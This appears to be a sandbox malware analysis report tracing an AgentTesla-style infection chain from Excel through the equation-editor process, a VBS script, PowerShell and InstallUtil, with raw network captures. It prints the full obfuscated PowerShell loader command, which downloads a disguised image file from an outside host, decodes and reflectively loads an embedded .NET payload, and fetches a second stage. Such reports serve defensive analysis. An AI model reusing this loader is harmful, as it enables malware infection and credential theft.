                                                            Dec 1, 2024 14:28:16.437638044 CET1236INData Raw: 74 4c 59 45 52 4d 59 45 52 4d 59 45 42 4d 41 49 4d 55 76 67 53 30 42 41 67 59 41 43 49 45 67 41 67 55 67 43 35 4c 6f 45 42 49 41 49 48 30 77 67 53 45 77 67 53 45 41 41 49 55 49 67 53 41 41 41 46 55 77 67 52 41 41 49 46 6b 77 67 53 41 41 41 46 6b
                                                            Data Ascii: tLYERMYERMYEBMAIMUvgS0BAgYACIEgAgUgC5LoEBIAIH0wgSEwgSEAAIUIgSAAAFUwgRAAIFkwgSAAAFkvgSYABIUwgRUwgRUwgRUwgRkhEZIRADKR/CKRgAKR+CKR9CKR8CKR7CGhDHgCCI0hEF0BBHgAHCEAAEgQRBKhDxKoEOEugSYwBO4Q6CKRAgYQ5CKBAgUACxKoEBUrgSUhDxKoE9EoEhLoEOcwBWkIgSAAAF4QLBKR
                                                            Dec 1, 2024 14:28:16.437783003 CET1236INData Raw: 4d 67 67 44 56 49 6f 45 46 30 52 46 43 4b 52 42 64 34 77 42 48 38 41 43 56 49 6f 45 52 48 6f 45 46 30 52 46 43 4b 52 4e 43 4b 52 47 43 4b 52 42 64 67 77 42 57 77 68 41 42 41 43 42 41 47 6f 45 42 45 4f 67 52 55 42 43 63 34 51 48 53 49 41 49 47 67
                                                            Data Ascii: MggDVIoEF0RFCKRBd4wBH8ACVIoERHoEF0RFCKRNCKRGCKRBdgwBWwhABACBAGoEBEOgRUBCc4QHSIAIGgAgBKRAhDYEVgQBdgQBdgQBdwXgRAYgSUQBF0hEdIxDHECC8FYEAGoEAGoEAGoEAGoEdAYgS0BgBKRHAGoEIUQHIAYgS0wBlgQBdIwBFgQgCKhAHYAC9JoECcgBOEQZBKRFO4gAAoAC5JR+BKhDd0agS4QANJRFGcg
                                                            Dec 1, 2024 14:28:16.437800884 CET896INData Raw: 53 55 51 48 4f 6b 77 42 56 67 41 43 4f 30 42 51 42 4b 52 42 64 67 67 44 4f 34 41 57 42 4b 68 44 41 46 6f 45 42 30 6b 45 56 34 51 41 4e 4a 52 46 4e 63 77 48 49 67 67 44 64 67 67 44 64 67 67 44 64 34 51 48 56 47 6f 45 68 49 6f 45 4f 55 5a 67 53 45
                                                            Data Ascii: SUQHOkwBVgACO0BQBKRBdggDO4AWBKhDAFoEB0kEV4QANJRFNcwHIggDdggDdggDd4QHVGoEhIoEOUZgSEigS4gDd4QHO4gDB0kEV4QHOUxBqgQeSkfgSknE5HoEOEQ4AGRFtGoEtGoEO4QANJRFOEQTSUxCHQCCOEQ4AGRFAFoEO4QANJRFAFoEB0kEVYwBZIAGBIAIFgACIIAAFgACO0BCOUQHIgAQBKBCIUQHF0BKBKhDlGo
                                                            Dec 1, 2024 14:28:16.437812090 CET1236INData Raw: 4f 4d 51 53 43 4b 52 46 42 30 6b 45 56 77 67 41 54 45 77 45 41 4d 52 41 44 41 53 43 4f 34 67 44 44 6b 6b 67 53 55 42 43 49 4d 51 48 49 34 51 48 41 46 6f 45 4f 55 51 48 4f 34 67 44 64 34 41 43 4f 34 67 44 44 6b 6b 67 53 55 52 41 4e 4a 52 46 41 46
                                                            Data Ascii: OMQSCKRFB0kEVwgATEwEAMRADASCO4gDDkkgSUBCIMQHI4QHAFoEOUQHO4gDd4ACO4gDDkkgSURANJRFAFoEOUQHcUagSggDO4wAJJoEVEQTSUBQBKRANJRFVcgPIAUgSEQTSUBQBKhDO4gDIAZgSgVgSUQHF0BQBKRANJRFO4wBkgQBdggAAYQUSEQAgUQRCGR0BKRUSEwAgsACVGoEBJoERHoEZIR3BKhDNHoEIcQFIAUgSEQ
                                                            Dec 1, 2024 14:28:16.437823057 CET1116INData Raw: 4f 41 55 67 53 34 41 55 42 4b 68 44 41 46 6f 45 42 30 6b 45 56 34 77 42 76 51 65 67 53 45 51 34 41 47 52 46 49 51 65 67 53 45 51 54 53 55 78 42 49 6b 41 35 42 4b 52 41 68 44 59 45 56 67 67 44 64 41 55 67 53 45 51 54 53 55 42 35 42 4b 42 51 42 4b
                                                            Data Ascii: OAUgS4AUBKhDAFoEB0kEV4wBvQegSEQ4AGRFIQegSEQTSUxBIkA5BKRAhDYEVggDdAUgSEQTSUB5BKBQBKB4BKhDO0hDAFoEB0kEV0wBqgACOMgDFcwBIMQHI4QHD0BCO0BQBKhDO0hDO0hDO0hDO4AQBKRANJRFOMxBkMQHBEAIFMACBACBIgACIMQHIgwBHoAHcwhDDAgBc0hDBAQBIwRHc0BCO0BCO0hDd4QHOggDO0hDd4Q
                                                            Dec 1, 2024 14:28:16.437834024 CET1236INData Raw: 53 55 78 42 70 48 59 45 4f 30 68 44 64 49 41 49 4a 34 67 44 6c 48 6f 45 43 41 77 42 49 34 51 48 49 34 51 48 41 46 6f 45 42 30 6b 45 56 41 55 67 53 34 51 42 64 55 51 48 41 47 6f 45 34 46 6f 45 4f 34 67 44 64 67 51 42 64 67 67 44 4f 34 67 44 64 41
                                                            Data Ascii: SUxBpHYEO0hDdIAIJ4gDlHoECAwBI4QHI4QHAFoEB0kEVAUgS4QBdUQHAGoE4FoEO4gDdgQBdggDO4gDdAUgSEQTSUhFHETBd4QACAiBI0dgSIwBGgACF0RBdMAIIUQHF0R0BKhAgkQ2BGRABAiBxFRABASBIUQHO0cgS4Q0BKRzBKRBdgwBSEwEAACBAFoEOIQyBGRFJEwEAMhAJHYEVAAILAUgS4gAFHoEVkQATAwECUcgSUB
                                                            Dec 1, 2024 14:28:16.557710886 CET1236INData Raw: 52 55 42 43 49 46 6f 45 42 30 6b 45 56 63 41 43 49 46 6f 45 42 45 4f 67 52 55 42 53 42 4b 42 51 42 4b 52 41 4e 4a 52 46 45 63 51 46 49 77 54 67 53 49 77 42 47 67 41 43 43 63 41 42 68 46 6f 45 42 45 41 49 47 77 6d 45 42 6f 41 42 49 77 6d 45 73 4a
                                                            Data Ascii: RUBCIFoEB0kEVcACIFoEBEOgRUBSBKBQBKRANJRFEcQFIwTgSIwBGgACCcABhFoEBEAIGwmEBoABIwmEsJBbSQwBJgAHC4ABHYACJEAAEgACBAABI4AGIgAGCUQHdIRCH0ACdIBCDcgBcEQAAQgAQwRACAgBIwhADcQBNEQAgQQVBKRABAiBxEBAAQQTBKBAgUACY4ACEcgBIgAWRgVEEcACQJRAKQACQJBUSAlEEcQCMJRAKQA


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.2249164208.95.112.1803976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 1, 2024 14:28:18.456773996 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                            Host: ip-api.com
                                                            Connection: Keep-Alive
                                                            Dec 1, 2024 14:28:19.604567051 CET175INHTTP/1.1 200 OK
                                                            Date: Sun, 01 Dec 2024 13:28:19 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Content-Length: 6
                                                            Access-Control-Allow-Origin: *
                                                            X-Ttl: 60
                                                            X-Rl: 44
                                                            Data Raw: 66 61 6c 73 65 0a
                                                            Data Ascii: false
                                                            Dec 1, 2024 14:28:19.984272957 CET175INHTTP/1.1 200 OK
                                                            Date: Sun, 01 Dec 2024 13:28:19 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Content-Length: 6
                                                            Access-Control-Allow-Origin: *
                                                            X-Ttl: 60
                                                            X-Rl: 44
                                                            Data Raw: 66 61 6c 73 65 0a
                                                            Data Ascii: false


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.2249162142.215.209.774433784C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-01 13:28:00 UTC198OUTGET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1
                                                            Host: 1016.filemail.com
                                                            Connection: Keep-Alive
                                                            2024-12-01 13:28:01 UTC328INHTTP/1.1 200 OK
                                                            Content-Length: 2230233
                                                            Content-Type: image/jpeg
                                                            Last-Modified: Thu, 28 Nov 2024 11:44:46 GMT
                                                            Accept-Ranges: bytes
                                                            ETag: 1c84779d9886011235a5e11f64ee8efb
                                                            X-Transfer-ID: qxdlxyadbikkvgc
                                                            Content-Disposition: attachment; filename=new_imagem-vbs.jpg
                                                            Date: Sun, 01 Dec 2024 13:28:00 GMT
                                                            Connection: close
                                                            2024-12-01 13:28:01 UTC3485INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                            Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                            2024-12-01 13:28:01 UTC8192INData Raw: 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e 68 19 64 e5 58 1e 7d b3 c1 69 f4 cd ad fb 40 9a 7b 12 c1 09 34 5b a0 5e b9 ec 5e 3f bc a3 23 6e 08 78 21 78 39 89 e2 de 13 2c 7a 22 ba 15 da df c4 54 d1 61 7e f8 15 fb 43 e2 b1 21 8f 43 e1 e4 33 83 40 a9 fc 38 be 83
                                                            Data Ascii: ,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(hdX}i@{4[^^?#nx!x9,z"Ta~C!C3@8
                                                            2024-12-01 13:28:01 UTC8192INData Raw: 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 cc 16 c2 dd 7c 6b 1e d3 78 44 b3 e9 3c ed e8 97 f8 43 74 3f 1b c6 f4 cf 3f 85 ce ba 77 da d1 48 c4 86 f7 3f 03 81 84 fa 49 e0 da e5 1a 3f 55 2f 3b 49 3e f9
                                                            Data Ascii: ~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v|kxD<Ct??wH?I?U/;I>
                                                            2024-12-01 13:28:01 UTC8192INData Raw: 02 a7 23 81 df 01 73 00 56 2e 3a 9e 06 4b a5 c6 41 b0 47 5f 8e 37 a9 78 d6 31 42 bd 8e 27 24 84 8e e4 11 ce 06 64 fe 16 cf 20 71 23 2b f5 e4 70 72 d0 23 6e 0b 29 da c9 d8 f7 e7 36 35 05 06 96 30 2d 9f 6f 7c f3 b3 49 ac 69 e8 46 6d 4f 5a e3 03 5c de c0 28 55 d8 c2 c0 ea 14 b1 03 8e f9 95 e7 eb 28 12 80 83 c1 ae d8 70 a5 9c 12 e7 cb ff 00 08 c0 76 69 94 b2 81 1d 8e a5 b1 76 94 3d d2 01 d8 0c 93 22 35 20 24 57 63 8b a8 74 9a 47 93 98 c7 e1 38 0d 25 b1 16 28 f7 c7 02 a1 1e ae 49 e0 2e 79 dd 68 9d 26 67 8e 52 a9 b4 1c 3c de 2d 24 11 42 9b 55 d8 ad 93 7d fb 60 68 6a 35 09 a2 8c bc b4 49 e1 57 b9 39 95 1e 9f 53 e3 52 36 a6 56 d9 12 fb 0e 00 1e d8 dc 05 fc d8 35 da a7 a6 b0 54 15 04 06 06 ef 3d 2e 97 ed 2f 88 88 f6 45 ab 52 07 3b 55 10 1f 95 01 81 8f 16 87 4d 0e
                                                            Data Ascii: #sV.:KAG_7x1B'$d q#+pr#n)650-o|IiFmOZ\(U(pviv="5 $WctG8%(I.yh&gR<-$BU}`hj5IW9SR6V5T=./ER;UM
                                                            2024-12-01 13:28:01 UTC8192INData Raw: cd 48 34 c9 13 4a c0 30 de c5 88 ec 78 16 7f 4c c7 d6 e9 f5 12 6b 35 0b 24 7a 96 04 01 0b 46 fb 54 0a ef ce 07 22 c2 ec 8f 1e a6 66 49 4b 6d da d2 1b 03 bd ee 3d f2 ba dd 46 9f 45 2a 24 8d 3b 16 6d a4 2c ec 08 e9 47 96 c6 f4 1a 35 8f c3 74 a9 23 15 92 15 20 8b ee 6f ae 2b e2 b0 3b 6b 21 64 d3 b3 45 b4 6e 74 bb dd f1 a6 18 16 9f 4b 33 b4 52 69 27 7f 22 a9 95 a5 7f 51 bf 7b c5 3c 4f ca 4d 14 e8 7c e4 95 82 b0 0f 33 10 cd ba 8f 04 d7 f0 f5 cd 5f 0f 69 61 f0 ff 00 2b 50 18 36 e6 da 5b 92 07 6e b9 9d f6 8d 75 0b e1 f1 ca a4 b4 4a 69 c0 21 54 73 c1 fc e8 60 64 c5 e1 32 be 82 1d 5c 6b b8 04 6d e1 9f f0 80 cd ce 2d f7 57 d4 48 91 88 c9 91 c6 e5 e8 01 1e f6 73 6f c1 e4 96 7f 02 68 c3 ed 72 8d b0 70 45 96 61 55 f1 aa fa e7 2f 87 b4 70 69 75 b3 34 91 c8 8b 18 64 07
                                                            Data Ascii: H4J0xLk5$zFT"fIKm=FE*$;m,G5t# o+;k!dEntK3Ri'"Q{<OM|3_ia+P6[nuJi!Ts`d2\km-WHsohrpEaU/piu4d
                                                            2024-12-01 13:28:01 UTC8192INData Raw: 9e 0f 7c 66 25 05 00 43 6c 7b 60 0a 19 5a 37 fc 3b be 18 64 94 48 f4 c9 55 d7 2a e1 34 f2 6d 3e a3 df 2a 92 b3 3e d0 14 06 e2 c0 c0 b6 a7 60 da 00 ac aa 4c 04 1e 53 ee db 76 2b a5 e3 9f 77 8c a9 49 19 8b 01 43 db 0d a7 f0 c8 25 4f 59 90 1e e4 1e 30 11 3a ba 40 84 31 03 9e b9 ab a6 d5 2c fa 5d be a6 2a 28 ae ee 46 64 6a 21 8f 4f a8 29 cb 01 84 d1 cc 90 ce a4 06 25 b8 23 00 72 b2 ac f3 06 52 7d 6d 5c d5 73 97 f0 f3 ff 00 6d 53 40 70 7b 5f 6c 0c a5 7c e9 2c 30 25 8d 0f ae 31 a4 45 8a 6f 32 46 20 2a 96 55 1f 88 f1 fa 60 6d 3a 17 00 2f 41 ea 38 16 d4 47 0a 80 5c 71 d4 f6 18 b9 d4 cd 14 9e a6 0a 82 c8 41 c9 db c7 7f ae 67 6a 48 9b 53 23 05 2a 59 81 00 fb 56 03 f3 78 9c 61 a9 2d 87 73 db 19 1a b4 68 43 0b 61 59 98 da 15 15 fb c0 38 e6 f1 8d 26 91 11 8b b3 9a fe
                                                            Data Ascii: |f%Cl{`Z7;dHU*4m>*>`LSv+wIC%OY0:@1,]*(Fdj!O)%#rR}m\smS@p{_l|,0%1Eo2F *U`m:/A8G\qAgjHS#*YVxa-shCaY8&
                                                            2024-12-01 13:28:01 UTC8192INData Raw: a0 ed a5 3c f6 3d 0f d3 3c 1e a4 6a fe e8 e7 ef 71 3c 21 f7 6d 8d b7 00 d5 ef 5e c7 e5 81 de 44 4c 11 9d 14 9a ed 80 d6 68 02 c6 65 89 48 5e b5 ef 96 8c bb c6 0a 4a b2 39 1c 96 7e 17 e8 31 e0 cf a7 d3 a2 34 b1 01 d5 9a 41 66 ba fa 6f f2 c0 c0 85 03 4a a1 81 db 74 4e 6f 2e 8d 8e 99 a3 d3 c6 ad c5 ae f1 75 99 32 47 18 32 08 9d 36 a9 ea cd ea 3f 2a 19 6d 18 9e 52 51 35 2b 15 ff 00 89 c8 fe 58 16 94 43 01 11 ea 21 61 20 ea c3 8f cb 34 3c 3f 53 08 57 65 0a 84 8d a0 9a b0 3d f1 29 74 fa a6 91 d2 49 14 b7 53 64 92 05 8e 86 be 18 3f 28 a9 a3 a8 42 58 74 0d 55 7e fc 60 7a 58 0e 9a 58 1b cb 95 8c 7b 68 f1 61 b1 8d 24 10 e9 dc c7 09 6a 72 28 d7 04 f7 cc 9d 0f 86 78 8c 24 34 1a 98 51 59 2b 6e e6 20 f3 f1 19 af a4 d1 ea 16 49 b5 12 6a 44 ac c4 b8 8c 9b 51 c9 ae 48 be
                                                            Data Ascii: <=<jq<!m^DLheH^J9~14AfoJtNo.u2G26?*mRQ5+XC!a 4<?SWe=)tISd?(BXtU~`zXX{ha$jr(x$4QY+n IjDQH
                                                            2024-12-01 13:28:01 UTC8192INData Raw: 6a 62 6c 33 02 2e ba 57 4a 38 c6 a3 54 91 43 13 cd 1d f9 ac aa ca 54 1e bd 41 fa 73 81 97 a6 f0 77 9b 44 26 f2 95 24 1b 59 57 b3 a8 1e cd 75 fe b8 1d 70 ba 8f 0b 92 58 b6 47 01 8d 59 c0 25 d2 2d c1 7b 90 55 40 e0 ff 00 9b 1f d0 78 80 93 4a 9a 89 09 58 94 31 24 29 f4 81 7e d5 dc 37 6c 14 1e 22 66 98 20 89 96 49 90 34 42 47 60 18 0b ed fc 3c 73 80 83 f8 03 fa d1 93 78 12 29 f3 ac 2d a9 07 77 a6 fb 1a ce 6f 0c 78 f4 27 4b 1e 95 65 95 9b d1 3d a9 dc 2e c1 bb e3 81 54 71 f8 b5 93 6a bc ca 48 c6 c7 64 a6 73 4c 41 16 2f 6f b5 e0 4f 89 3b e9 b4 ba d3 14 6a ad 2e d5 56 93 dc 30 36 6b 8c 00 6a bc 3a 0d 66 bf 54 b1 c3 1a 88 e0 64 50 b4 b5 2f 6b fc f2 d1 78 73 c7 aa d1 15 8d 96 32 14 4e aa e1 41 65 5b 52 54 55 fa 81 37 96 d4 eb 24 fb c1 78 55 49 3a 76 91 9a 39 03 2e
                                                            Data Ascii: jbl3.WJ8TCTAswD&$YWupXGY%-{U@xJX1$)~7l"f I4BG`<sx)-wox'Ke=.TqjHdsLA/oO;j.V06kj:fTdP/kxs2NAe[RTU7$xUI:v9.
                                                            2024-12-01 13:28:01 UTC8192INData Raw: 96 49 65 62 07 45 51 7b b0 9b 0a 46 24 76 01 47 01 54 00 3d f0 4b b9 e5 2e ce 4a af 27 2e 5c ba 94 3e 95 1c 28 f6 ff 00 ae 04 14 f3 4f 12 fc 48 e9 83 31 05 07 d5 f4 f7 c2 44 94 4f b5 64 84 2c 39 c0 e4 86 e1 24 b5 6e ec 73 43 45 e1 ea c8 1c cc 14 8e 45 62 6a a4 2e de c7 34 b4 b0 b3 c2 ac 87 a0 aa fa e0 0e 6f 0f 77 98 16 99 99 4f 00 fb 65 8f 86 24 6a 5c cc 7d 23 1c 86 27 79 57 73 7a 42 f2 3e 37 83 d4 c2 ff 00 76 52 5a 94 df 3e fc e0 66 69 b4 fe 7c a5 37 91 de fd f1 d1 a0 2b 4b e7 b0 c1 c4 be 59 2c 3f 16 34 65 f5 07 07 8d be af 9e 02 33 c0 52 b7 cd bf b0 c2 ae 8c 90 b5 3d 12 3a 65 5d 37 31 62 3a e7 22 15 60 c3 a8 c0 24 50 f9 6c 76 ea 39 ef 91 2c 0d b7 d5 31 6f 96 13 ca 42 8c 41 7b be 40 ca a2 7a 8a 28 34 df 1a c0 45 e1 b7 02 c9 07 b9 c3 1f 0f 55 50 c5 e8 9e
                                                            Data Ascii: IebEQ{F$vGT=K.J'.\>(OH1DOd,9$nsCEEbj.4owOe$j\}#'yWszB>7vRZ>fi|7+KY,?4e3R=:e]71b:"`$Plv9,1oBA{@z(4EUP
                                                            2024-12-01 13:28:01 UTC8192INData Raw: 7d 16 8d 13 9b 7e 1d a1 6d 5b b7 88 ca a6 48 8a 42 34 ca e3 65 6d 4d a5 b6 0f 48 f5 13 5d 6b f8 78 20 9c 8f 0e f0 6d 27 86 f8 6b 78 87 8c 21 f4 95 31 42 c4 86 e0 92 05 03 c9 3e d5 c7 37 5c d2 da ef b4 3a 8d 7b c6 25 81 c8 64 53 0c 5a 7d 4f a7 76 ed ca 59 57 bd 00 36 92 3a 13 c1 3c 06 b6 a7 c7 34 5a 59 57 56 27 5d 5b 99 df 6c b2 a9 6f 2c 28 50 e9 19 55 e2 d5 80 1c d7 52 5b b1 f3 b2 f8 b4 5a b1 0b 6b b5 4d 34 cc b3 29 7d bb 56 2d f1 aa 82 45 72 a2 8d ed 00 d8 35 bb 82 73 f5 7a 78 a3 2a f0 3c 92 69 a4 b3 1b 3a 32 fc 0a dd 51 2b cf 22 c5 1b e0 9a c4 88 5d b2 31 0c 08 20 02 a2 d4 1f 8d fc 8f e5 81 a1 e2 1a 98 b5 0d a4 84 f9 2b 1a 21 0d 2c 51 95 53 6c 4b 30 b1 b8 f5 3c 50 03 a0 15 58 8c d2 a3 93 22 a8 5d c5 95 94 5f 03 76 e0 4f f2 ff 00 87 3a 10 95 24 93 ac 85
                                                            Data Ascii: }~m[HB4emMH]kx m'kx!1B>7\:{%dSZ}OvYW6:<4ZYWV'][lo,(PUR[ZkM4)}V-Er5szx*<i:2Q+"]1 +!,QSlK0<PX"]_vO:$


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:08:27:04
                                                            Start date:01/12/2024
                                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                            Imagebase:0x13f5f0000
                                                            File size:28'253'536 bytes
                                                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:2
                                                            Start time:08:27:52
                                                            Start date:01/12/2024
                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                            Imagebase:0x400000
                                                            File size:543'304 bytes
                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:08:27:55
                                                            Start date:01/12/2024
                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mentallanguagefatalmemtallliz.vbs"
                                                            Imagebase:0x7f0000
                                                            File size:141'824 bytes
                                                            MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:08:27:56
                                                            Start date:01/12/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $elar = 'JGZsZWltb3NvID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdW5pY2VsdWxhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNvcmNvdmFkbyA9ICR1bmljZWx1bGFyLkRvd25sb2FkRGF0YSgkZmxlaW1vc28pOyRuZXRhbWVudGUgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkY29yY292YWRvKTskYmVpamFmbG9yID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleHBsb3NpciA9ICc8PEJBU0U2NF9FTkQ+Pic7JGZhYmFnZWxsYSA9ICRuZXRhbWVudGUuSW5kZXhPZigkYmVpamFmbG9yKTskbXVuaGEgPSAkbmV0YW1lbnRlLkluZGV4T2YoJGV4cGxvc2lyKTskZmFiYWdlbGxhIC1nZSAwIC1hbmQgJG11bmhhIC1ndCAkZmFiYWdlbGxhOyRmYWJhZ2VsbGEgKz0gJGJlaWphZmxvci5MZW5ndGg7JGZvbG9zYSA9ICRtdW5oYSAtICRmYWJhZ2VsbGE7JGdlcm1pY2lkYSA9ICRuZXRhbWVudGUuU3Vic3RyaW5nKCRmYWJhZ2VsbGEsICRmb2xvc2EpOyRwZW5oYXNjb3NvID0gLWpvaW4gKCRnZXJtaWNpZGEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGdlcm1pY2lkYS5MZW5ndGgpXTskZGV0cmFjdGl2byA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHBlbmhhc2Nvc28pOyRjb3Jlb2dyYWZpYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGRldHJhY3Rpdm8pOyRib3RpbSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRib3RpbS5JbnZva2UoJG51bGwsIEAoJ3R4dC5zc3NzZ2liYW1tZS81MDEuNjguMTIxLjc4Ly86cHR0aCcsICckcGlwb2NvJywgJyRwaXBvY28nLCAnJHBpcG9jbycsICdJbnN0YWxsVXRpbCcsICckcGlwb2NvJywgJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJzEnLCckcGlwb2NvJykpOw==';$alteastro = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($elar));Invoke-Expression $alteastro
                                                            Imagebase:0x1060000
                                                            File size:427'008 bytes
                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.520366968.0000000007226000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.520366968.0000000007226000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:08:28:16
                                                            Start date:01/12/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                            Imagebase:0x60000
                                                            File size:41'112 bytes
                                                            MD5 hash:AF862061889F5B9B956E9469DCDAE773
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
